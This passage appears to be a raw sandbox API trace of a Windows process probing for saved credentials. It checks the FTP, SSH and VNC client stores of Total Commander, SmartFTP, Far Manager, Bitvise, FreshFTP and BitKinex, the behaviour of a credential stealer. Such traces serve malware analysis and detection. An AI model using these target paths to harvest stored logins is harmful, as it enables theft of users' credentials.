hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0147.364] GetProcessHeap () returned 0x690000 [0147.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6ab500 [0147.365] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.366] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb84 | out: param_1="C:\\ProgramData\\NetDrive2\\drives.dat") returned 35 [0147.366] GetProcessHeap () returned 0x690000 [0147.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4a) returned 0x6a8db8 [0147.366] GetProcessHeap () returned 0x690000 [0147.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.368] PathFileExistsW (pszPath="C:\\ProgramData\\NetDrive2\\drives.dat") returned 0 [0147.368] GetProcessHeap () returned 0x690000 [0147.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.368] GetProcessHeap () returned 0x690000 [0147.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.369] GetProcessHeap () returned 0x690000 [0147.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.370] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.370] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Windows") returned 0x0 [0147.370] GetProcessHeap () returned 0x690000 [0147.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5c) returned 0x6ab500 [0147.371] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.372] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0147.372] GetProcessHeap () returned 0x690000 [0147.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x30) returned 0x6a6918 [0147.372] GetProcessHeap () returned 0x690000 [0147.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.374] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0147.374] GetProcessHeap () returned 0x690000 [0147.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6918 | out: hHeap=0x690000) returned 1 [0147.375] GetProcessHeap () returned 0x690000 [0147.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.375] GetProcessHeap () returned 0x690000 [0147.375] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5c) returned 0x6ab500 [0147.376] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.377] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0147.377] GetProcessHeap () returned 0x690000 [0147.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x66) returned 0x6a8db8 [0147.377] GetProcessHeap () returned 0x690000 [0147.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.379] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0147.379] GetProcessHeap () returned 0x690000 [0147.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.380] GetProcessHeap () returned 0x690000 [0147.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.380] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.381] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0147.381] GetProcessHeap () returned 0x690000 [0147.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5c) returned 0x6ab500 [0147.382] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.383] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0147.383] GetProcessHeap () returned 0x690000 [0147.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x46) returned 0x6aab68 [0147.383] GetProcessHeap () returned 0x690000 [0147.383] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.385] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0147.385] GetProcessHeap () returned 0x690000 [0147.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aab68 | out: hHeap=0x690000) returned 1 [0147.385] GetProcessHeap () returned 0x690000 [0147.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.386] GetProcessHeap () returned 0x690000 [0147.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6c) returned 0x6ab500 [0147.387] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.387] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0147.387] GetProcessHeap () returned 0x690000 [0147.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x76) returned 0x6a7670 [0147.388] GetProcessHeap () returned 0x690000 [0147.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.389] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0147.389] GetProcessHeap () returned 0x690000 [0147.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7670 | out: hHeap=0x690000) returned 1 [0147.389] GetProcessHeap () returned 0x690000 [0147.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0147.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.390] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb74*=0x104) returned 0x2 [0147.391] GetProcessHeap () returned 0x690000 [0147.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.391] GetProcessHeap () returned 0x690000 [0147.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.392] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.392] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0147.392] GetProcessHeap () returned 0x690000 [0147.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f56) returned 0x6ab500 [0147.393] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.394] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\SmartFTP", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 46 [0147.394] GetProcessHeap () returned 0x690000 [0147.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0147.394] GetProcessHeap () returned 0x690000 [0147.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.396] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 0 [0147.396] GetProcessHeap () returned 0x690000 [0147.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.397] GetProcessHeap () returned 0x690000 [0147.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.411] GetProcessHeap () returned 0x690000 [0147.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6aa2c8 [0147.411] GetProcessHeap () returned 0x690000 [0147.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b440 [0147.411] GetProcessHeap () returned 0x690000 [0147.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0147.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.413] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far\\Plugins\\FTP\\Hosts", phkResult=0x6ab3b0 | out: phkResult=0x6ab3b0*=0x0) returned 0x2 [0147.413] GetProcessHeap () returned 0x690000 [0147.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0147.413] GetProcessHeap () returned 0x690000 [0147.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0147.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.414] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far2\\Plugins\\FTP\\Hosts", phkResult=0x6ab450 | out: phkResult=0x6ab450*=0x0) returned 0x2 [0147.414] GetProcessHeap () returned 0x690000 [0147.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0147.414] GetProcessHeap () returned 0x690000 [0147.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.415] GetProcessHeap () returned 0x690000 [0147.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b440 | out: hHeap=0x690000) returned 1 [0147.415] GetProcessHeap () returned 0x690000 [0147.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3fd4) returned 0x6ab500 [0147.415] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.416] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 109 [0147.416] GetProcessHeap () returned 0x690000 [0147.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xde) returned 0x6aa2c8 [0147.416] GetProcessHeap () returned 0x690000 [0147.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.417] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 0 [0147.418] GetProcessHeap () returned 0x690000 [0147.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.418] GetProcessHeap () returned 0x690000 [0147.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.419] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.420] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0147.420] Sleep (dwMilliseconds=0xa) [0147.435] GetProcessHeap () returned 0x690000 [0147.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ab500 [0147.435] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.436] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\%s", arglist=0x19f90c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp") returned 37 [0147.436] GetProcessHeap () returned 0x690000 [0147.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4e) returned 0x6a8db8 [0147.436] GetProcessHeap () returned 0x690000 [0147.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.437] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.tlp"), lpFindFileData=0x19f920 | out: lpFindFileData=0x19f920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x697858, ftLastWriteTime.dwHighDateTime=0x697858, nFileSizeHigh=0x6a3fb8, nFileSizeLow=0x6a41d0, dwReserved0=0x0, dwReserved1=0x19f97c, cFileName="ը睉", cAlternateFileName="뒭蕬͈읩ᅋ䇰ﮄ\x19䂑@")) returned 0xffffffff [0147.438] GetProcessHeap () returned 0x690000 [0147.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.438] GetProcessHeap () returned 0x690000 [0147.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.439] GetProcessHeap () returned 0x690000 [0147.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.440] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.440] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0147.441] Sleep (dwMilliseconds=0xa) [0147.455] GetProcessHeap () returned 0x690000 [0147.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ab500 [0147.456] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.457] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp") returned 38 [0147.457] GetProcessHeap () returned 0x690000 [0147.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x50) returned 0x6a8db8 [0147.457] GetProcessHeap () returned 0x690000 [0147.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.458] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.bscp"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x697858, ftLastWriteTime.dwHighDateTime=0x697858, nFileSizeHigh=0x6a3fb8, nFileSizeLow=0x6a41d0, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը睉", cAlternateFileName="뒭蕬͈읩ᅳ䇰ﭬ\x19䂑@")) returned 0xffffffff [0147.459] GetProcessHeap () returned 0x690000 [0147.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.460] GetProcessHeap () returned 0x690000 [0147.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.461] GetProcessHeap () returned 0x690000 [0147.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0147.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.462] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Bitvise\\BvSshClient", pszValue="LastUsedProfile", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb74*=0x104) returned 0x2 [0147.462] GetProcessHeap () returned 0x690000 [0147.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.462] GetProcessHeap () returned 0x690000 [0147.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.463] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.464] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0147.465] Sleep (dwMilliseconds=0xa) [0147.483] GetProcessHeap () returned 0x690000 [0147.483] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ab500 [0147.484] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.485] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc") returned 37 [0147.485] GetProcessHeap () returned 0x690000 [0147.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4e) returned 0x6a8db8 [0147.485] GetProcessHeap () returned 0x690000 [0147.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.486] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.vnc"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x697858, ftLastWriteTime.dwLowDateTime=0x697858, ftLastWriteTime.dwHighDateTime=0x6a3fb8, nFileSizeHigh=0x6a41d0, nFileSizeLow=0x0, dwReserved0=0x19f96c, dwReserved1=0x77490568, cFileName="", cAlternateFileName="͈읩ᅻ䇰")) returned 0xffffffff [0147.486] GetProcessHeap () returned 0x690000 [0147.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.487] GetProcessHeap () returned 0x690000 [0147.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.487] GetProcessHeap () returned 0x690000 [0147.487] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.488] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.488] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0147.490] Sleep (dwMilliseconds=0xa) [0147.503] GetProcessHeap () returned 0x690000 [0147.503] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ab500 [0147.504] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.505] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc") returned 35 [0147.505] GetProcessHeap () returned 0x690000 [0147.505] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4a) returned 0x6aa530 [0147.505] GetProcessHeap () returned 0x690000 [0147.506] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.506] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.vnc"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x697858, ftLastWriteTime.dwLowDateTime=0x697858, ftLastWriteTime.dwHighDateTime=0x6a3fb8, nFileSizeHigh=0x6a4650, nFileSizeLow=0x0, dwReserved0=0x19f954, dwReserved1=0x77490568, cFileName="", cAlternateFileName="螚䇆ᅣ䇰")) returned 0xffffffff [0147.507] GetProcessHeap () returned 0x690000 [0147.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.507] GetProcessHeap () returned 0x690000 [0147.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.507] GetProcessHeap () returned 0x690000 [0147.507] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.508] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.509] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0147.509] GetProcessHeap () returned 0x690000 [0147.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f54) returned 0x6ab500 [0147.509] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.510] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\mSecure", arglist=0x19fb64 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 39 [0147.510] GetProcessHeap () returned 0x690000 [0147.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x52) returned 0x6aa530 [0147.510] GetProcessHeap () returned 0x690000 [0147.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.512] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 0 [0147.512] GetProcessHeap () returned 0x690000 [0147.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.513] GetProcessHeap () returned 0x690000 [0147.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.513] GetProcessHeap () returned 0x690000 [0147.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.515] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.515] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0147.515] GetProcessHeap () returned 0x690000 [0147.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f58) returned 0x6ab500 [0147.516] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.518] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Syncovery", arglist=0x19fb94 | out: param_1="C:\\ProgramData\\Syncovery") returned 24 [0147.518] GetProcessHeap () returned 0x690000 [0147.518] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x34) returned 0x69d528 [0147.518] GetProcessHeap () returned 0x690000 [0147.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.520] PathFileExistsW (pszPath="C:\\ProgramData\\Syncovery") returned 0 [0147.520] GetProcessHeap () returned 0x690000 [0147.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.520] GetProcessHeap () returned 0x690000 [0147.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69d528 | out: hHeap=0x690000) returned 1 [0147.521] GetProcessHeap () returned 0x690000 [0147.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.522] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.523] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.523] GetProcessHeap () returned 0x690000 [0147.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab500 [0147.525] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.526] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 59 [0147.526] GetProcessHeap () returned 0x690000 [0147.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6aa530 [0147.526] GetProcessHeap () returned 0x690000 [0147.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.528] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 0 [0147.528] GetProcessHeap () returned 0x690000 [0147.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.529] GetProcessHeap () returned 0x690000 [0147.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.529] GetProcessHeap () returned 0x690000 [0147.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6ab500 [0147.530] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.531] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\BitKinex\\bitkinex.ds", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 58 [0147.531] GetProcessHeap () returned 0x690000 [0147.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x78) returned 0x6a6ff0 [0147.531] GetProcessHeap () returned 0x690000 [0147.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.533] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 0 [0147.534] GetProcessHeap () returned 0x690000 [0147.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ff0 | out: hHeap=0x690000) returned 1 [0147.534] GetProcessHeap () returned 0x690000 [0147.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6a) returned 0x6ab500 [0147.535] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.536] wvsprintfW 